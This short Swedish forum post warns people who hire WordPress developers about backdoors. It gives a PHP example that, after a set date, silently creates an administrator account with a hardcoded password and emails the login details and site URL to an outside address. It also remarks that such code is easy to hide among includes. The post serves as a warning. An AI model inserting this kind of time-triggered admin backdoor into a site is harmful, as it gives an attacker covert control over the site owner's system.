När ni köper tid av paranoida WP-utvecklare finns det en metod som liknar vad som TS visade upp, att hålla koll på. Här är ett övertydligt exempel som väntar in att ett datum ska passeras. När datumet passeras skapas en adminanvändare automatiskt och ett mail går ut till "hackaren".
if ( strtotime( "2012-03-15" ) < time() ) {
require_once( ABSPATH . WPINC . '/registration.php' );
if ( !username_exists( 'the-secret-backdoor' ) ) {
add_action( 'shutdown', 'backdoor_create_new_admin' );
function backdoor_create_new_admin() {
$user_id = wp_insert_user( array(
'user_login' => 'the-secret-backdoor',
'user_pass' => 'thesecretpassword1337haxxors',
'user_email' => '
[email protected]',
'role' => 'administrator'
) );
wp_mail( '
[email protected]', 'New Admin account is ready', 'WP - '.get_bloginfo( 'wpurl' ).' | username: the-secret-backdoor | password: thesecretpassword1337haxxors' );
} } }
Jag kan tänka mig att detta kan maskeras väl med massa includes..